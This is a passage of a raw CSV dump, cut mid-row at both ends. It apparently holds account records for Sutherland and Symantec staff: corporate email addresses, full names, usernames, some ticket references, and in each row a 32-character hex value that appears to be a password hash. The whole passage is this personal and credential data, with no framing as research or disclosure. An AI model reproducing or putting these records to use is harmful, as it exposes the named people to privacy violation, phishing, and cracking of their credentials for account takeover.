ae4cc7f249001e4c48b6005e1ca24,Ramakant,<blank>,Bhushan_Ramakant_Bhoirr,Bhushan,N
ULL,NULL,NULL
5c-429d-b7e6-656567cf8094,<blank>,<blank>,BijuKumar_Valiyaveetil@SUTH.COM,Suther
land,b68e504b23f077bd7e227ea8197f4ace,Kumar,<blank>,Binu_Kumar_V_V,Binu,NULL,NUL
L,NULL
25-4947-8bf0-1353f4d9901c,<blank>,<blank>,Blessing_James@suth.com,Sutherland,8b6
c040df8c47bc74209cd30d3b5b538,James,<blank>,Blessing_James,Blessing,NULL,NULL,NU
LL
7d-4a21-93ca-bcb7717198ea,<blank>,<blank>,Brendon_Dsouza@suth.com,Sutherland,8b9
c2774bac7e56333d42c8dc67acdce,Arcadius,<blank>,Brendon_Arcadius_Dsouza,Brendon,N
ULL,NULL,NULL
2c-4052-96a8-7875857d5af9,<blank>,<blank>,SSBuddy1@suth.com,Sutherland,80f50f321
5e2652fdbad71803d0b2fa8,Stanley,<blank>,Buddy_Stanley_Sequeira,Buddy,NULL,NULL,N
ULL
62-4b85-b222-799aad153167,<blank>,<blank>,Calvin_Decouto@SUTH.COM,Sutherland,5a8
95568e7b8a34c8d0e9121ace13e25,Decouto,<blank>,Calvin_Decouto,Calvin,NULL,NULL,NU
LL
07-412c-9b95-88248130657c,<blank>,<blank>,Chaitali_Mantri@SUTH.COM,Sutherland,70
4ca1774e96d64c8288173b8d814746,Rajnikant,<blank>,Chaitali_Rajnikant_Mantri,Chait
ali,NULL,NULL,NULL
fb-4a6b-9833-774ef654ac68,<blank>,<blank>,Chamundeswari_J@SUTH.COM,Sutherland,2f
1dd64c20af20d7eaf57e505d62418a,J,<blank>,Chamundeswari_J,Chamundeswari,NULL,NULL
,NULL
3c-4470-b79c-3221fedb88c5,<blank>,<blank>,Chetan_Nevgi@SUTH.COM,Sutherland,ca7ad
0b5c5f0ea2d8732406dadc73cef,Vinayak,<blank>,Chetan_Vinayak_Nevgi,Chetan,NULL,NUL
L,NULL
a1-4ce2-a255-cf02898952ed,<blank>,<blank>,Chithra_G@SUTH.COM,Sutherland,63633bc7
16a1e935b7250c79429af154,G,<blank>,Chithra_G,Chithra,NULL,NULL,NULL
8c-478d-8190-f9ea37a6592b,<blank>,<blank>,Danish_Kably@SUTH.COM,Sutherland,b09f9
d94a7e91744025c88f97b878e98,Farooq,<blank>,Danish_Farooq_Kably,Danish,NULL,NULL,
NULL
dd-45ef-b09c-b167171495d0,<blank>,<blank>,pdarshan@suth.com,Sutherland,c46949d74
e8831ba1b09f74d4ad11a53,Pathak,<blank>,Darshan_Pathak,Darshan,NULL,NULL,NULL
96-4768-ae69-f184e69a3265,<blank>,<blank>,David_Raphael@SUTH.COM,Sutherland,31ec
8e0e6f440953a0a7907861a0d5fc,Raphael,<blank>,David_Raphael,David,NULL,NULL,NULL
2a-4a2b-9fd8-905d97fcea71,<blank>,<blank>,Deepa_T2@SUTH.COM,Sutherland,764d70a01
aa67337b1cf62165a48ac55,T,<blank>,Deepa_T,Deepa,NULL,NULL,NULL
a2-4ef9-9579-40e23e7daf90,<blank>,<blank>,DeepakSaravana_G@SUTH.COM,Sutherland,b
5c0b6d50994f7bd007a6a645e119054,Saravana,<blank>,Deepak_Saravana_G,Deepak,NULL,N
ULL,NULL
f5-4e9f-b823-5dedb1d75fd9,<blank>,2633284,tools_id@symantec.suth.com,Sutherland,
43afa04f5de3d0631bfe4110ea7693e3,S,<blank>,Deepali_S_Galgali,Deepali,NULL,NULL,N
ULL
22-4bdf-b55a-0ad3268b7b37,<blank>,<blank>,Deepshikha_Mahto@SUTH.COM,Sutherland,d
2692f9d9f6e8e32d82cca20c8c6cbea,Mahto,<blank>,Deepshikha_Mahto,Deepshikha,NULL,N
ULL,NULL
bb-4d4f-9ef8-e4acebddaded,<blank>,<blank>,Deepthi_Vijayappan@SUTH.COM,Sutherland
,797e980b4cca0b54cd2acb1f711aa0ec,Vijayappan,<blank>,Deepthi_Vijayappan,Deepthi,
NULL,NULL,NULL
4f-4102-9de3-5ef577c37bef,<blank>,<blank>,Denzil_Lobo@SUTH.COM,Sutherland,b5ca4e
9e1e780c9eac3142e2f8f2a21c,Lobo,<blank>,Denzil_Lobo,Denzil,NULL,NULL,NULL
1b-417c-bc63-4cc9f8a7631d,<blank>,<blank>,Devi_Gopinath@SUTH.COM,Sutherland,efde
11e19d8645725ad44e16431b2b36,Avneesh,<blank>,Devi_Avneesh_Gopinath,Devi,NULL,NUL
L,NULL
c7-4f89-8d31-f80d59abd616,<blank>,<blank>,dhanalakshmi_v@suth.com,Sutherland,b27
21e1cbb2d0135b8d98ad46917eb68,Veluchamy,<blank>,Dhanalakshmi_Veluchamy,Dhanalaks
hmi,NULL,NULL,NULL
db-43e4-ab00-ea397e9ed7cb,<blank>,<blank>,Dhanasekar_D@SUTH.COM,Sutherland,6339c
cf9e78aab72c136fb0128f8390d,D,<blank>,Dhanasekar_D,Dhanasekar,NULL,NULL,NULL
07-4e2b-b293-131e075c5c10,<blank>,<blank>,Dibin_N@SUTH.COM,Sutherland,a4448f6f70
3e5bfe970720db99dbedad,N,<blank>,Dibin_N,Dibin,NULL,NULL,NULL
1f-4beb-a9b5-4ced46a17e5c,<blank>,<blank>,Binu_Joseph@SUTH.COM,Sutherland,d8b8ac
1fdc38158704caed6b389d078d,Joseph,<blank>,Binu_Joseph,Binu,NULL,NULL,NULL
4b-485c-bae9-387b949ae251,<blank>,<blank>,DeepakN_Pahalajani@SUTH.COM,Sutherland
,fe19f48952cf8eb89e72abe63a0b9666,N,<blank>,Deepak_N_Pahalajani,Deepak,NULL,NULL
,NULL
2d-4558-ab92-6fe53ed803b8,<blank>,<blank>,Dilip_N@SUTH.COM,Sutherland,64547b2b7e
2b6d313ff153a44319deb5,N,<blank>,Dilip_N,Dilip,NULL,NULL,NULL
4d-4615-a02e-bd655600f6a2,<blank>,<blank>,kcdilli@suth.com,Sutherland,a46a05b9c1
90584ee4fe56d4d31510d8,Kumar,<blank>,Dilli_Kumar_Chokkalingam,Dilli,NULL,NULL,NU
LL
40-4f4a-ab66-63771ba8b43d,<blank>,<blank>,Dineshkumar_A2@SUTH.COM,Sutherland,56b
9af9672b545209898678bf6e1aedf,kumar,<blank>,Dinesh_kumar_A,Dinesh,NULL,NULL,NULL
fb-4dfe-9545-57388b451d5a,<blank>,<blank>,Dinkar_Rajan@SUTH.COM,Sutherland,22c5c
5d57c742cb396fcdea767cb6746,Rajan,<blank>,Dinkar_Rajan,Dinkar,NULL,NULL,NULL
db-4c8f-81bb-60a2eda24df3,<blank>,<blank>,DiptiLahkar_A@SUTH.COM,Sutherland,aaa8
dbef1764e2f6bba5bd193c15ff66,Lahkar,<blank>,Dipti_Lahkar_A,Dipti,NULL,NULL,NULL
f7-4ddb-8228-cf0dc485ee5d,<blank>,<blank>,Divya_P@SUTH.COM,Sutherland,9deedb6bc9
ad61b9cbf8ffeb66e5c4d8,P,<blank>,Divya_P,Divya,NULL,NULL,NULL
b1-4da2-bcf6-fba592fd2fae,<blank>,<blank>,Dixon_Melit@SUTH.COM,Sutherland,18ff01
67147ed38ebc81c3b4a96bb69d,James,<blank>,Dixon_James_Melit,Dixon,NULL,NULL,NULL
dc-4ede-b87a-c08540fe7c8e,<blank>,<blank>,Donald_Romany@SUTH.COM,Sutherland,433e
453855219cf937fa76500208d304,Pathalil,<blank>,Donald_Pathalil_Romany,Donald,NULL
,NULL,NULL
ed-4e1b-9cb3-1c72244e9770,<blank>,<blank>,Eben_Thomas@SUTH.COM,Sutherland,49a1f4
161a31518e7c1d31a02233ef5b,Jose,<blank>,Eben_Jose_Thomas,Eben,NULL,NULL,NULL
a0-4710-ad69-2d392e05c3ea,<blank>,<blank>,Fardeen_Ikrami@SUTH.COM,Sutherland,05d
6b45656afd9efb82da2ace790feda,Nasiruddin,<blank>,Fardeen_Nasiruddin_Ikrami,Farde
en,NULL,NULL,NULL
20-4fb0-9864-f225f29adf6b,<blank>,<blank>,Feroz_Khan1@SUTH.COM,Sutherland,0e6afb
5f29344b1b9ea7502fe1f49c0a,Asgar,<blank>,Feroz_Asgar_Khan,Feroz,NULL,NULL,NULL
6b-4505-b936-14e70d092b6c,<blank>,<blank>,Ganesh_Rajendran@SUTH.COM,Sutherland,e
d9c4679209d1a93580a373c7543887b,Rajendran,<blank>,Ganesh_Rajendran,Ganesh,NULL,N
ULL,NULL
75-4753-9c8c-be3ad57ff580,<blank>,<blank>,garima_sinha@symantec.suth.com,Sutherl
and,386ba5b11e5aee88d874a48353ad02b3,Sinha,<blank>,Garima_Sinha,Garima,NULL,NULL
,NULL
33-4e4f-9f3c-20fc50dc0d1e,<blank>,<blank>,Gaurav_Desai@SUTH.COM,Sutherland,39512
19a66f6a2ba069c1c81d46dcafa,Prabhakar,<blank>,Gaurav_Prabhakar_Desai,Gaurav,NULL
,NULL,NULL
00-4265-9a96-5c9e7a22ac42,<blank>,<blank>,gaurav_gulati@suth.com,Sutherland,64b7
1a022066359247d91ffbf49df8f0,Varsh,<blank>,Gaurav_Varsh_Gulati,Gaurav,NULL,NULL,
NULL
6b-4c4c-8923-4f588ea5df1a,<blank>,<blank>,Gerald_WilliamGloria@SUTH.COM,Sutherla
nd,f92f60bebb447e0461c24968a9a7e3bf,William,<blank>,Gerald_William_Gloria,Gerald
,NULL,NULL,NULL
aa-4fea-9616-47a04e7f1dd0,<blank>,<blank>,Girish_Mayekar@SUTH.COM,Sutherland,2ac
93037bdde56fa3c412c728bc6682d,Kiran,<blank>,Girish_Kiran_Mayekar,Girish,NULL,NUL
L,NULL
7b-45db-bcba-0cb6a14bac9a,<blank>,<blank>,Gopalraj_Chettiar@SUTH.COM,Sutherland,
4c7520cce634d3f193b69e3f90df116a,Natraj,<blank>,Gopalraj_Natraj_Chettiar,Gopalra
j,NULL,NULL,NULL
95-40f7-b482-64e70b6ef934,<blank>,<blank>,Gopinath_R@SUTH.COM,Sutherland,453b629
9d32d08238384bc27cf8c1d34,R,<blank>,Gopinath_R,Gopinath,NULL,NULL,NULL
fe-443f-9dc6-518847776bfe,<blank>,<blank>,Gopinath_S1@SUTH.COM,Sutherland,a913a4
f5a1dad95b4606486864881533,S,<blank>,Gopinath_S,Gopinath,NULL,NULL,NULL
70-4fda-a9c7-472a7f6e2f35,<blank>,<blank>,Gopison_Dhanapal@SUTH.COM,Sutherland,a
4c0526bad7383e05ec8f5b6d9c28fb1,Dhanapal,<blank>,Gopison_Dhanapal,Gopison,NULL,N
ULL,NULL
ae-4458-a8c1-a8d21ac83762,<blank>,<blank>,Gowthaman_P@SUTH.COM,Sutherland,280dd0
413d5110f69ef732002af6c0aa,Panneer,<blank>,Gouthaman_Panneer_Selvam,Gouthaman,NU
LL,NULL,NULL
ff4e-4bc2-b4c0-30335fac857a,<blank>,EMPROV,Sharon_Seth@Symantec.com,Symantec,26e
a3c1944b22fcd767e6f85e8b92aab,Seth,<blank>,080796,Sharon,NULL,NULL,NULL
aa-459e-b668-dc25a3381cd0,<blank>,<blank>,Greeshma_Kurian@SUTH.COM,Sutherland,d6
3d136b4aa21abe75ebad487b2504d1,Kurian,<blank>,Greeshma_Kurian,Greeshma,NULL,NULL
,NULL
b7-454d-880f-3998ccf73d69,<blank>,<blank>,Grenville_DMello@SUTH.COM,Sutherland,5
67abfd48d05fe4b1a3ebb938c40ca48,Edwin,<blank>,Grenville_Edwin_DMello,Grenville,N
ULL,NULL,NULL
ef-4e27-b941-f077f0955023,<blank>,<blank>,Guhan_K2@SUTH.COM,Sutherland,2a634c906
9d1c71b294f493d1ca76b67,K,<blank>,Guhan_K,Guhan,NULL,NULL,NULL
9b-4fd1-b693-4b2d86cd8757,<blank>,<blank>,Guhan_RS@SUTH.COM,Sutherland,584384128
83386332ce38a57815afe34,R,<blank>,Guhan_R_S,Guhan,NULL,NULL,NULL
68-4537-b6be-ac13e7dd42b9,<blank>,<blank>,Gulsar_Peermohamed@SUTH.COM,Sutherland
,0851a62f1f7fbf0f80d8ba99fbad63f3,Peermohamed,<blank>,Gulsar_Peermohamed,Gulsar,
NULL,NULL,NULL
c7-46f6-a680-3bd03ba7adf9,<blank>,<blank>,Gunasekaran_U@SUTH.COM,Sutherland,9246
9024c89868dc566fac422a3cb019,U,<blank>,Gunasekaran_U,Gunasekaran,NULL,NULL,NULL
9c-4282-b4b8-c48eb2aa7c67,<blank>,2633282,tools_id@symantec.suth.com,Sutherland,
c0c5c8067c492e1ae80a13826f6ff512,Singh,<blank>,Gursharan_Singh,Gursharan,NULL,NU
LL,NULL
6a-4228-ad03-09c760ff4b57,<blank>,<blank>,Guruprasad_P.Kirtiwar@SUTH.COM,Sutherl
and,ac682c8a0dacd959230afd64ec322332,P.Kirtiwar,<blank>,Guruprasad_P.Kirtiwar,Gu
ruprasad,NULL,NULL,NULL
be-41a1-bc55-a983e96585d5,<blank>,<blank>,kevin_kerwien@symantec.com,Symantec,06
77b48cbd0b7bfd7c9e6e016f414e13,Kerwien,<blank>,kevin_kerwien_test,Kevin,NULL,NUL
L,NULL
db-404a-88d4-5932d39f566a,<blank>,<blank>,william_thornton@symantec.com,Symantec
,64bf14ee22d026504444640bc4cb1c58,Thornton,<blank>,william_thornton,William,NULL
,NULL,NULL
55-4387-9eb7-140632a0485b,<blank>,<blank>,HariHaraSudhan_MS@SUTH.COM,Sutherland,
8535f26bafa1f0f74bf783806d2b6bf9,Hara,<blank>,Hari_Hara_Sudhan_M_S,Hari,NULL,NUL
L,NULL
81-4cf5-8ac5-61ccc64970e4,<blank>,<blank>,HariRamSenthil_M@SUTH.COM,Sutherland,5
168395e2d34b3727933b5b0733e8209,Ram,<blank>,Hari_Ram_Senthil_M,Hari,NULL,NULL,NU
LL
71-4665-b74e-f0467bf28cec,<blank>,<blank>,gharini@suth.com,Sutherland,2f905e0273
a718d32a44ac0b8ec59dd8,Gopalan,<blank>,Harini_Gopalan,Harini,NULL,NULL,NULL
53-40e5-97b4-0777d0d0151a,<blank>,<blank>,HemanthKumar_M@SUTH.COM,Sutherland,581
1b9f6ac2bfe4cd8d8a9a634846940,Kumar,<blank>,Hemanth_Kumar_M,Hemanth,NULL,NULL,NU
LL
91-4b25-8155-9006ff975ed0,<blank>,<blank>,Hena_Varghese@SUTH.COM,Sutherland,116e
27eaa6df73cdb90c736fc6bf80bc,Varghese,<blank>,Hena_Varghese,Hena,NULL,NULL,NULL
cc-4bab-8a99-07940c02f6a4,<blank>,<blank>,HepzibahJudith_E@SUTH.COM,Sutherland,3
67334e54d05962368194f17c239aa0a,Judith,<blank>,Hepzibah_Judith_E,Hepzibah,NULL,N
ULL,NULL
56-4a6e-88eb-77dcf1d0866d,<blank>,<blank>,HimaBindu_B@SUTH.COM,Sutherland,aeb915
c1cb0589f987dd7e8d42391eb9,Bindu,<blank>,Hima_Bindu_B,Hima,NULL,NULL,NULL
1b-4a8a-9179-949205af6e34,<blank>,<blank>,PBHitesh@suth.com,Sutherland,18a2c4fb2
494c3329ea312dfe95416f7,Babulal,<blank>,Hitesh_Babulal_Patel,Hitesh,NULL,NULL,NU
LL
52-4e52-a08b-7d81b0d7e56a,<blank>,<blank>,Brendan_Gracious@SUTH.COM,Sutherland,8
fcc7247cc4841eb0c549f513c8b3c29,Brian,<blank>,Brendan_Brian_Gracious,Brendan,NUL
L,NULL,NULL
ce-49e7-9803-42bf2cfb013a,<blank>,<blank>,BuchiBalaji_A@SUTH.COM,Sutherland,d634
13a6d0d764a34787ac5fba874047,Balaji,<blank>,Buchi_Balaji_A,Buchi,NULL,NULL,NULL
3d00-44d6-b6b8-c31afcdefa6b,"CRQ000000829985 CLNP Oct 08,2012",000-0000,leslie_s
erilo@symantec.com,Symantec,08f6bf80003570a9ace339068002a996,Serilo,<blank>,2305
84,Leslie,NULL,NULL,NULL
f6-4ee7-9fb1-67b2eef4ea75,<blank>,<blank>,Danish_Shaikh@SUTH.COM,Sutherland,51e4
d49dbe38a85d36b5464f4c617e7c,Khalil,<blank>,Danish_Khalil_Shaikh,Danish,NULL,NUL
L,NULL
e8-44e4-ba9e-5b56065ccec2,<blank>,<blank>,Deepu_Sudarsanan@SUTH.COM,Sutherland,7
303aef489a2884b0eb1884474b46cdd,Sudarsanan,<blank>,Deepu_Sudarsanan,Deepu,NULL,N
ULL,NULL
8f-461a-bf77-0e5844d27a3e,<blank>,<blank>,Delsya_Maggin@SUTH.COM,Sutherland,916c
972be4cdd4b96a73c639b3c52c8e,B,<blank>,Delsya_B_Maggin,Delsya,NULL,NULL,NULL
1e-4347-9292-1fb1f4980d2b,<blank>,<blank>,Denny_James@SUTH.COM,Sutherland,4bb782
b4c8c6038f1ad8525df106b29c,Joseph,<blank>,Denny_Joseph_James,Denny,NULL,NULL,NUL
L
50f3-4854-8a5f-8da13b29f659,CRQ000000513220--VMD--19/01/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,71b9bddaacbfd5224e0048aac78de828,Canuto,<blank>,12367
0,Guiller,NULL,NULL,NULL
0f8-4d20-831b-d8baf8208898,<blank>,<blank>,Tools_id@symantec.suth.com,Symantec,f
85cb6f67f264e8563177f7c168315e0,Tubon,<blank>,maeliboon_tubon,Mae,NULL,NULL,NULL
fb-4274-bf1a-670123ec23b3,<blank>,<blank>,Dheeraj_Ganiga@SUTH.COM,Sutherland,fbd
46eaf6cd03305cf893f2b4d4cef5e,Devraj,<blank>,Dheeraj_Devraj_Ganiga,Dheeraj,NULL,
NULL,NULL
cb-4e0c-8b7e-f7e68053d957,<blank>,<blank>,Divakar_J@SUTH.COM,Sutherland,358d2fb8
1cd555846bdb6b3c56a4e73d,J,<blank>,Divakar_J,Divakar,NULL,NULL,NULL
dc-48f1-ae4e-d1547248f979,<blank>,<blank>,Dyana_RP@SUTH.COM,Sutherland,dc74c1518
042c22a3bd081c9b1f5f068,Kumar,<blank>,Dyana_Kumar_Ramya_Prakash,Dyana,NULL,NULL,
NULL
2e83-4e1a-8de6-e8a9431c92ef,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,f553b05a47c78d21e5cd19cb042c0543,Bural,<blank>,085709,Jeremy,NULL,NULL,NULL
c1-4ac3-9a1e-b858104348e1,<blank>,<blank>,Farhan_Khan@SUTH.COM,Sutherland,f833df
9638c3437b44b10d29c9c3eb24,Sattar,<blank>,Farhan_Sattar_Khan,Farhan,NULL,NULL,NU
LL
93-482e-b7b5-7db887d1327d,<blank>,<blank>,Ganesh_G2@SUTH.COM,Sutherland,a5538cba
07dba67cd81952b6daa0a2a9,G,<blank>,Ganesh_G,Ganesh,NULL,NULL,NULL
a517-4523-8b8e-b61fa79dfb6e,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,e84b01c6ff0d62d09d92751e5c1fa8af,Karunakaran,<blank>,073
968,Sudhakar Ambalur,NULL,NULL,NULL
e6-4e64-ad4b-0775d8049247,<blank>,<blank>,GhouseKhan_H@SUTH.COM,Sutherland,e88a7
98567319f98e25a54579eb7904f,Khan,<blank>,Ghouse_Khan_H,Ghouse,NULL,NULL,NULL
4e0c-4efd-ba5e-9f08ea40f1e9,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,cf89c25fe3d2b44557429d0e73d64001,Marudula,<blank>,074411,Mary M,NULL,NULL
,NULL
2b-4479-a6c6-4b05607a586a,<blank>,<blank>,HariPrasad_R2@SUTH.COM,Sutherland,0291
047a123a7c2a4d1c1c6a610f0580,Prasad,<blank>,Hari_Prasad_R,Hari,NULL,NULL,NULL
2a-4514-8d3c-76362dc6f04b,<blank>,<blank>,Hitesh_Ladhani@SUTH.COM,Sutherland,2e0
d70cb281f2be02c819b202f705ff4,Gulab,<blank>,Hitesh_Gulab_Ladhani,Hitesh,NULL,NUL
L,NULL
6a-462d-a149-434827195fc9,<blank>,<blank>,Hitesh_Thakker@SUTH.COM,Sutherland,96d
e5f72a802aacbfa2ec3fe2ca597fd,Sunil,<blank>,Hitesh_Sunil_Thakker,Hitesh,NULL,NUL
L,NULL
28-4ad6-b810-af6c7710eba3,<blank>,<blank>,Hittesh_Ahuja@SUTH.COM,Sutherland,47fb
b123a3163b4fccf0fd927eb8c84b,Nishit,<blank>,Hittesh_Nishit_Ahuja,Hittesh,NULL,NU
LL,NULL
0c-4694-a412-5f925e0f36eb,<blank>,<blank>,Hrudaynath_Bagwe@suth.com,Sutherland,1
2c6d8928c1a963d629d550034307948,Dinanath,<blank>,Hrudaynath_Dinanath_Bagwe,Hruda
ynath,NULL,NULL,NULL
7d-4fb1-aa14-76bf0c4a24d4,<blank>,<blank>,Imran_Mohammed@SUTH.COM,Sutherland,0d2
ce39da50f42d05835c4b858d12079,Yunus,<blank>,Imran_Yunus_Mohammed,Imran,NULL,NULL
,NULL
51-4269-b220-1e09e4df96d3,<blank>,<blank>,Imrani_Rahmani@SUTH.COM,Sutherland,cbb
76170cbe0e6b040732042f3addd4c,Pasha,<blank>,Imrani_Pasha_Rahmani,Imrani,NULL,NUL
L,NULL
eb-463c-8129-cc27dc9b130d,<blank>,<blank>,Inbarajan_A@SUTH.COM,Sutherland,323281
f2651c5ef6827cb9b4b3908a50,A,<blank>,Inbarajan_A,Inbarajan,NULL,NULL,NULL
3a-4ae6-8a1a-474ee355a482,<blank>,<blank>,Iqbal_B@SUTH.COM,Sutherland,ab598553e9
242782b5ce528d175587e5,B,<blank>,Iqbal_B,Iqbal,NULL,NULL,NULL
1b57-4123-9f9d-5301b795c310,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,5
1172d10523e137ec628c06dbde622c1,Nalabolu,<blank>,089278,Ramu,NULL,NULL,NULL
51-418d-908a-480db8863203,<blank>,<blank>,Ishaan_Vandoor@SUTH.COM,Sutherland,6e2
aa03299319ee7534bda902590ebe3,Meghji,<blank>,Ishaan_Meghji_Vandoor,Ishaan,NULL,N
ULL,NULL
12-4054-9b83-74e70910ce18,<blank>,2633251,tools_id@symantec.suth.com,Sutherland,
5e1dc8be47db6a8397245b0c09ee92df,Rocky,<blank>,Ivy_Rocky_Dsilva,Ivy,NULL,NULL,NU
LL
7dc2-4891-84d9-c1cad1dfcee5,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,bbb11a81e8e390ff2230bcd58878b024,M,<blank>,keerthi_m_cc,Keerthi,NULL,NULL
,NULL
e4-406e-9525-5f1852847bfe,WS 16-07-2010,INC213497,Cresvil_Nicholas@suth.com,Suth
erland,df34128842b05394beba41d069e11f65,Joseph,<blank>,Cresvil_Joseph_Nicholas,C
resvil,NULL,NULL,NULL
03-49c3-b7b5-b98c2853e6c9,<blank>,<blank>,DaisySavitha_F@SUTH.COM,Sutherland,f17
ca6d55decfb153c17e076d059c7cf,Savitha,<blank>,Daisy_Savitha_F,Daisy,NULL,NULL,NU
LL
32-49cd-8889-f13c0ffdcc1e,<blank>,<blank>,Daksha_Jajal@SUTH.COM,Sutherland,69dec
a4e495a7ae6d778665d0ba46740,Ketan,<blank>,Daksha_Ketan_Jajal,Daksha,NULL,NULL,NU
LL
58-4bca-b673-1dcbc4a8128d,<blank>,<blank>,Daljeet_Bunayat@SUTH.COM,Sutherland,b5
6b712a574382f06b52766c7c53a4ab,Singh,<blank>,Daljeet_Singh_Bunayat,Daljeet,NULL,
NULL,NULL
06-45f6-8220-fb3856d12952,<blank>,<blank>,Dani_Elamana@SUTH.COM,Sutherland,06c5d
5a7fbf0fa4be78ffe10e7e6abe8,V,<blank>,Dani_V_Elamana,Dani,NULL,NULL,NULL
56-486f-a825-425fee50680e,<blank>,<blank>,Darshita_Rana@SUTH.COM,Sutherland,f300
f99b0f6bdc9b54afb08d7e9e0d3b,Jitendra,<blank>,Darshita_Jitendra_Rana,Darshita,NU
LL,NULL,NULL
9c-4cd0-8e41-15e1972e1183,<blank>,<blank>,DavidsonMark_M@SUTH.COM,Sutherland,a74
a9f4ed3575b86caa6bdbf5ab7d19c,Mark,<blank>,Davidson_Mark_M,Davidson,NULL,NULL,NU
LL
e8-460b-88db-7c3fbd9ec89c,<blank>,<blank>,Deepan_S@SUTH.COM,Sutherland,86bd187ec
ad9c71b781abf5009b8e2e0,S,<blank>,Deepan_S,Deepan,NULL,NULL,NULL
ef-42b0-8d8a-08910ce499d1,<blank>,<blank>,Deepthi_Ranjith@SUTH.COM,Sutherland,d1
aa1ab2bd832527587be5aa3b0a3ca2,Ranjith,<blank>,Deepthi_Ranjith,Deepthi,NULL,NULL
,NULL
29-469c-a9fc-b6e18844d95a,<blank>,<blank>,Dhwani_Sanghvi@SUTH.COM,Sutherland,41c
a1fd25de455eca04ae77c4dd6f6e0,Kirit,<blank>,Dhwani_Kirit_Sanghvi,Dhwani,NULL,NUL
L,NULL
a7-4963-8d33-99ec9a80bba7,<blank>,<blank>,DineshRaaj_P@SUTH.COM,Sutherland,4da88
00b538e088da4446eafde5f916a,Raaj,<blank>,Dinesh_Raaj_P,Dinesh,NULL,NULL,NULL
a7-4e20-8db2-632ad02a829e,<blank>,<blank>,MHDipti1@suth.com,Sutherland,caccb9bec
e26b8066a959928a0a86cb0,Hemant,<blank>,Dipti_Hemant_Makaria,Dipti,NULL,NULL,NULL
dd-4794-a4b6-7ef02436210a,<blank>,<blank>,Eldo_KC@SUTH.COM,Sutherland,56c50aba59
020bc8ab1372ccf4a231bc,K,<blank>,Eldo_K_C,Eldo,NULL,NULL,NULL
0f-465d-8d14-597593ccc47c,<blank>,<blank>,Ellison_Dmello@SUTH.COM,Sutherland,93a
31db55a763854a13345c1fd7b01a3,Kevin,<blank>,Ellison_Kevin_Dmello,Ellison,NULL,NU
LL,NULL
f9-4a6a-9b0b-1722995e3972,<blank>,<blank>,Faris_Najeeb@SUTH.COM,Sutherland,f2fe4
cec0851884863224a99d80b003d,Najeeb,<blank>,Faris_Najeeb,Faris,NULL,NULL,NULL
f5-41d3-b960-8fae7d7ade49,<blank>,<blank>,FrancisXavier_A@SUTH.COM,Sutherland,44
2f84405f01fdc87c669ccea246c037,Xavier,<blank>,Francis_Xavier_A,Francis,NULL,NULL
,NULL
131a-483c-aacf-dd7c71a2d692,WS 26-07-2010,INC000000225859,tools_id@symantec.suth
.com,<blank>,f1bc33d8106fcdb118ffce8100e6145d,S,<blank>,099904,Sivaprakasam,NULL
,NULL,NULL
ab-4606-b49b-21bf4bd41e80,<blank>,<blank>,Ganesh_Thadathil@SUTH.COM,Sutherland,a
a4332f981f99efd060d4f5f5a6e2db8,Mohandas,<blank>,Ganesh_Mohandas_Thadathil,Ganes
h,NULL,NULL,NULL
f5c6-4d21-adf3-b937e12fbd9c,CRQ000000228116,<blank>,tools_id@symantec.suth.com,K
SC-28/03/2011,cf2328a21152877ef6396d31970dc1f7,golde,<blank>,114293,MarieRotess,
NULL,NULL,NULL
dc-4559-90fe-0d4003e081f2,<blank>,<blank>,Hitesh_Chandramohan@suth.com,Sutherlan
d,5a0263d4dc1fce44c299f441c76ba9c6,Chandramohan,<blank>,Hitesh_Chandramohan,Hite
sh,NULL,NULL,NULL
719d-4412-bfae-cce560d96545,CRQ000000439568--VMD--06/12/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,dd22c7361075c5bd45046a3e6b6e844a,Cabreros,<blank>,122
781,Ritchel Omaguing,NULL,NULL,NULL
f0-4c17-b3f9-2d3871c3f875,<blank>,<blank>,Jacob_Kavoor@SUTH.COM,Sutherland,e6d67
9a3d55951d8ba2f92cc5f092d7a,Kovoor,<blank>,Jacob_Kovoor,Jacob,NULL,NULL,NULL
cf-428f-b425-a6b00f6c8818,<blank>,<blank>,Jagadesan_Rajaram.S.N.@SUTH.COM,Suther
land,28ea944d40bb36eeaa3a50542912b284,Rajaram,<blank>,Jagadeesan_Rajaram_S_N,Jag
adeesan,NULL,NULL,NULL
58-4cc0-b43e-cbe362ea8d08,<blank>,<blank>,JaganMohan_P@SUTH.COM,Sutherland,1056a
d0ce8c9e9f8fe6b9110f72a4607,Mohan,<blank>,Jagan_Mohan_P,Jagan,NULL,NULL,NULL
77-4443-9c66-82c050adb5f7,<blank>,<blank>,Jairaj_Ukkath1@SUTH.COM,Sutherland,8bc
db597af34215d54f4a42b3b1bac02,Ukkath,<blank>,Jairaj_Ukkath,Jairaj,NULL,NULL,NULL
c3-479f-8a18-ccb70e2981e3,<blank>,<blank>,JamsheedP_C@SUTH.COM,Sutherland,3c57fe
79a5d178d065389939603a4612,P,<blank>,Jamsheed_P_C,Jamsheed,NULL,NULL,NULL
4a-4493-8119-fb9d69f76667,<blank>,<blank>,Jamshiyas_TP@SUTH.COM,Sutherland,b8ddd
16d14316cf540aef043cdfd53fa,T,<blank>,Jamshiyas_T_P,Jamshiyas,NULL,NULL,NULL
1d-4ee8-9514-66d63fd84b4d,<blank>,<blank>,Janardhanan_MR@suth.com,Sutherland,b36
cd5a57d70fd6c9e5eccc05f18ccbd,Mireal,<blank>,Janardhanan_Mireal_Radhakrishnan,Ja
nardhanan,NULL,NULL,NULL
9a-4a61-a2fb-eccf6823b038,<blank>,<blank>,DharaniRaj_MV@SUTH.COM,Sutherland,dbb1
9c41a008986ff88bdaef409d023b,Raj,<blank>,Dharani_Raj_M_V,Dharani,NULL,NULL,NULL
2e-4f10-8872-bf9a6adaf4b2,<blank>,<blank>,pdharmanand@suth.com,Sutherland,251bd3
917acca00a5f15927681bf13a3,Pandey,<blank>,Dharmanand_Pandey,Dharmanand,NULL,NULL
,NULL
f7-41a1-8444-96eeb105027b,<blank>,<blank>,Diwakar_G@SUTH.COM,Sutherland,79423ed7
3329c4d1727d44ffd54f8188,G,<blank>,Diwakar_G,Diwakar,NULL,NULL,NULL
bb-4718-9f4a-8599e5366aff,<blank>,<blank>,Erezath_Subhagan@SUTH.COM,Sutherland,6
